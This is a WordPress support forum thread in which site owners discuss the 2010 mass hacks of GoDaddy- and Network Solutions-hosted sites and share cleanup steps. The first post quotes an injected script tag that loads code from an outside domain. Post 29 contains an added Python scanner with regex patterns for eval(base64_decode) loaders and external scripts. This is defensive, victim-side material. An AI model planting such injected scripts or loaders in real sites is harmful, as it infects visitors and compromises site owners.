Site Hacked (59 posts)

  1. dailyotaku
    Member
    Posted 2 weeks ago #

    First off, sorry if this is the wrong section. My site is self-hosted on WordPress 2.8.6 and has been hacked as of yesterday; a bit of code:

    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    was put into the site, along with some other code. I am in the process of deleting everything right now, MySQL and all my files, but the above code is still here. What should I do to get rid of it? And what could be the cause of this virus, and tips/suggestions would be awesome, thanks

    site at the moment (Safe) view-source:http://www.dailyotaku.com/

  2. Snat
    Member
    Posted 2 weeks ago #

  3. dailyotaku
    Member
    Posted 2 weeks ago #

    thanks but that hardly helps

  4. samboll
    moderator
    Posted 2 weeks ago #

    thanks but that hardly helps

    what kind of help do you want
    you're the only one who can fix this

    some additional "help"

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottopress.com/2009/hacked-wordpress-backdoors/

  5. redkathy
    Member
    Posted 2 weeks ago #

    Will a restore from an earlier date be sufficient to fix the problem?

  6. samboll
    moderator
    Posted 2 weeks ago #

    Will a restore from an earlier date be sufficient to fix the problem?

    possibly if all of the files are clean

  7. redkathy
    Member
    Posted 2 weeks ago #

    Thanks for responding. I'm in the process now. This is the second hack with GoDaddy this month. Two different redirects so can I assume two different hacks?

  8. Steve D
    Member
    Posted 2 weeks ago #

    GoDaddy is experiencing another hacker assault (attack occurred 5/1/10 at about 3:35am) similar to what NS has been going through all of April and I expect is trying to ward off again today. NS has shut down FTP since last night.

    I'm seeing many GoDaddy WP customers reporting on this latest round this morning. Your only option is to be prepared for lots of headaches. I've been working since April 18 to clean up my platform and things still aren't quite right.

    Your main concern right now should be intrusion monitoring. Clean up your site the best you can, backup nightly, look for suspicious file changes daily.

    http://ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.html

  9. dailyotaku
    Member
    Posted 2 weeks ago #

    I restored everything, virus is gone for now. Quick question: I am using the wp-download manager backup and the images don't show on the site, and plugins don't work. Possible reasons for this?

    thanks for the advice, Steve

  10. Steve D
    Member
    Posted 2 weeks ago #

    images don't show on the site . .

    That's a permissions issue. NS instructed everyone to reset permissions.
    That worked and the images showed up. The only other thing I noticed through all this is a problem with permissions remaining firmly set on my host's end. I would set them but they would change themselves back to the undesired permission. Very strange.

    I am coming to the conclusion at this point that these attacks on both NS and GD are being launched by some reasonably sophisticated hacker operations. Major "surprise attacks" including rogue accounts, etc.

    http://www.nationaldefensemagazine.org/archive/2010/May/Pages/RussianCyberthiefCaseIllustratesSecurityRisks.aspx

  11. dailyotaku
    Member
    Posted 2 weeks ago #

    what should I set the permissions to and where?

  12. ClaytonJames
    Member
    Posted 2 weeks ago #

    @dailyotaku

    I couldn't help but notice you may be restoring a version of WordPress 2.8.

    This is interesting information ....(from GDHosting)

    http://wordpress.org/support/topic/391658?replies=4#post-1498431

    And some good information located here: Hardening WordPress, with points of interest located at item 1, Keep up to date with the latest WP version, under the heading "Vulnerabilities in the WordPress package itself".

    Just some more information for consideration.

  13. dd@sucuri.net
    Member
    Posted 2 weeks ago #

    Lots of sites got hacked at GoDaddy today. Not only WordPress, but also Joomla and simple HTML-only sites.

    It seems to be a problem on GoDaddy itself. Link:
    http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html

  14. dailyotaku
    Member
    Posted 2 weeks ago #

    thanks for the tip, updated it to the latest version as far as I can see. And added some security plugins

  15. Steve D
    Member
    Posted 2 weeks ago #

    what should I set the permissions to and where?

    You may have something in your GoDaddy account manager that says Reset Permissions. You can try calling support or browse around.

    That may not even help right now until GoDaddy gets things under control. Your main goal is to look into what backups you may or may not have available on your server's side. Or your side of things.

    They should be willing to clean your and others' sites free. This is what NS has been doing. In part to prevent further reinfection if something's hiding in unattended sites that owners haven't checked or logged into in three weeks, or two months.

  16. dailyotaku
    Member
    Posted 2 weeks ago #

    I wish GoDaddy helped us like NS. GoDaddy didn't do anything, gave me a link to a bad guide and you're on your own.

  17. Steve D
    Member
    Posted 2 weeks ago #

    For all the complaints and frustrations NS has done everything possible to get this thing under control and get everyone cleaned up. They've also taken it seriously enough to bring in law enforcement and additional security consultants.

    An internal breach is serious stuff.

  18. dd@sucuri.net
    Member
    Posted 2 weeks ago #

    @Steve D: I agree with you. NS response was pretty good and they helped everyone who called and asked for help.

    I am not seeing the same with GoDaddy yet.

  19. dailyotaku
    Member
    Posted 2 weeks ago #

    time to switch hosts!

  20. seriesgo
    Member
    Posted 2 weeks ago #

    My English is so bad. Since today at 3:00 am (gt-5 Colombia) my site was hacked, I don't know what the problem is with GoDaddy, because this problem happened about fifty days ago. What is NS?

  21. Steve D
    Member
    Posted 2 weeks ago #

    Two different redirects so can I assume two different hacks?

    Hard to tell but obviously these attacks have been extremely "organized" and formidable.

    Look at this timeline so you are prepared mentally if these attacks being launched on GD turn out to be similar in their intensity.

    Timeline of Events:

    April 7: Database injections are identified on our WordPress hosted accounts.
    Actions: websites are scanned and cleaned and steps are commenced to contain the issue.

    April 16: Additional malicious code appears on customers’ website files.
    Actions: operations team continues to run scans that identify code and clean customer websites.

    April 18-24: The criminals dynamically inject code on customers’ websites and change signatures each time. The criminals add viruses and/or malware to customers’ sites.
    Actions: security and network experts work to contain the infections and prevent additional issues.

    April 25-present: Security and network teams confirm that security measures continue to contain the malicious code.

    Ongoing: We continue to monitor and implement additional measures as needed to protect our customers. Customers who have not logged in to their sites for at least three weeks are now reporting infections and are being escalated to technical services. The security team confirmed that these are not new cases of infections.

  22. Steve D
    Member
    Posted 2 weeks ago #

    seriesgo, NS is Network Solutions.

  23. seriesgo
    Member
    Posted 2 weeks ago #

    Thanks Steve, I have just completely restored my GoDaddy site to April 28 thanks to the File Manager utility. What would you advise those of us who are victims of this problem? One curious detail is that I have several affected sites, and the ones falling victim to the vulnerability are the ones running under PHP4. Could that be a simple coincidence?

    Regards.

  24. redkathy
    Member
    Posted 2 weeks ago #

    FYI - GoDaddy users. It is true GoDaddy denies any responsibility. I doubt you will receive assistance without paying the minimum 150.00 fee.

    In the GoDaddy file manager you have the ability to restore your sites to an earlier date. I just completed restoring 6 sites and so far (fingers crossed) I have removed the exploit. My source files are clean. Hope this helps!

  25. jeffrev01
    Member
    Posted 2 weeks ago #

    First of all, this is not a GoDaddy issue. I have several friends with blogs hosted on other servers that are suffering the same fate. GoDaddy does have a great feature in the Account Management called the File Manager, which allows files to be restored from a previous calendar date. You can call GoDaddy support and they should be able to walk you through the process of using the File Manager.

    As for the hacks themselves, I see this more as a WordPress issue than a server side issue. All of the files hacked on my site are the core WordPress PHP files. Perhaps the next update of WordPress will look at ways of locking the file permissions down to keep the hacks from changing them and injecting all this nasty code. I do know one thing, this can certainly suck the life out of the average blog owner.

  26. Steve D
    Member
    Posted 2 weeks ago #

    First of all, this is not a GoDaddy issue.

    What if in fact GoDaddy has been breached-ambushed and this is just the beginning of what could possibly be a full assault similar to the attack on NS?

    Certainly with all the evidence out there they've taken this into consideration.

  27. Steve D
    Member
    Posted 2 weeks ago #

  28. ranganathan
    Member
    Posted 2 weeks ago #

    First of all, this is not a GoDaddy issue. I have several friends with blogs hosted on other servers that are suffering the same fate.

    As for the hacks themselves, I see this more as a WordPress issue than a server side issue.

    it's not just WP which is being hacked, other forum software is being hacked too!

    so it has to be GoDaddy's issue.

  29. WpBlogHost
    Member
    Posted 2 weeks ago #

    Here's how to fix this hack...

    First, let me say that any web host could be susceptible to a skilled hacker. It's even happened to sites like YouTube, Twitter, Facebook, banks, government sites/hosting... you name it, all of which do everything possible to prevent these things from happening.

    If you switch hosts, it could happen to your new host as well.

    For GoDaddy users, here's how you fix this problem.

    The good news is that this hack doesn't appear to do anything to your database, just all file extensions with the .php at the end.

    First, back up your database and all your web hosting files (even though they are infected) to your computer. Always always always back things up.

    Second, log into your web hosting control panel and go to your File Manager.

    Click on the "History" button on the left (just above the list of your directory structure).

    You should then see a list of all your files from previous days listed there. So if your site is hacked on May 1st, be sure you're looking at April 30th's backup. You should see the word "Changed" next to each file / folder which has been infected.

    As a check, try opening the index.php file and make sure the base64 code is not located in there. If it's not, then you're probably good to go ahead and use this date's backup; if it's there, go back even further in your history.

    Now that you know that date's files are clean, go back to your root folder (current date's folder) by clicking the "Current" button on the left.

    Put a check mark next to all files and folders which include .php files. This will include your wp-admin, wp-content, wp-includes folders as well as all your root files which end with .php.

    Once those are all deleted, go back to your "History" button and to the date with clean files.

    Check all the files which you had deleted from your Current area and then click "Restore" from the file menu above.

    Once the restore is complete, you should be up and running.

    Hope this helps. Also, you might want to check out how to help stop hacks from happening by visiting these sites:

    WordPress Defender

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    Perishable Press 4G Blacklist
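
The manual check in the post above (open index.php and look for the base64 code), extended to a whole site tree and to the injected `<script src=...>` tag from the first post, as an added example that is not part of the original thread. The two regex heuristics, the `scan_file`/`scan_tree` names, the host allowlist and the sample files are assumptions constructed for illustration; run it against a downloaded copy of the site before and after restoring.

```python
import re
import tempfile
from pathlib import Path

# Heuristics (assumed, not signatures taken from the thread):
#  - PHP that decodes a base64 blob and executes it
#  - <script> tags that load code from a host outside the allowlist
EVAL_B64 = re.compile(rb"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.I)
SCRIPT_SRC = re.compile(rb"<script[^>]+src\s*=\s*[\"']?https?://([^/\"'\s>]+)", re.I)

def scan_file(path, allowed_hosts=frozenset()):
    """Return a list of findings for one file (empty list means no hit)."""
    data = Path(path).read_bytes()
    findings = []
    if EVAL_B64.search(data):
        findings.append("eval(base64_decode(...))")
    for match in SCRIPT_SRC.finditer(data):
        host = match.group(1).decode("ascii", "replace").lower()
        if host not in allowed_hosts:
            findings.append(f"external script from {host}")
    return findings

def scan_tree(root, allowed_hosts=frozenset(), exts=(".php", ".html", ".htm", ".js")):
    """Walk root and map each flagged file (relative path) to its findings."""
    report = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            hits = scan_file(p, allowed_hosts)
            if hits:
                report[p.relative_to(root).as_posix()] = hits
    return report

def demo():
    # Constructed sample tree: one clean file and two modified ones.
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "wp-includes").mkdir()
        (root / "index.php").write_bytes(
            b'<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n'
            b'<?php require "wp-blog-header.php";')
        (root / "wp-includes" / "clean.php").write_bytes(b"<?php echo 'ok';")
        (root / "footer.html").write_bytes(
            b'<script src="http://injected.example/kp.php"></script>')
        return scan_tree(root, allowed_hosts={"www.dailyotaku.com"})

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, "->", "; ".join(hits))
```

A hit is a reason to inspect the file by hand, not proof of infection, and a clean result does not rule out backdoors that use other encodings.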

  30. redkathy
    Member
    Posted 2 weeks ago #

    As for the hacks themselves, I see this more as a WordPress issue than a server side issue. All of the files hacked on my site are the core WordPress PHP files. Perhaps the next update of WordPress will look at ways of locking the file permissions down to keep the hacks from changing them and injecting all this nasty code. I do know one thing, this can certainly suck the life out of the average blog owner.

    I have 6 sites written in PHP, not all WordPress, and ALL were hacked. The problem is most certainly with GoDaddy.
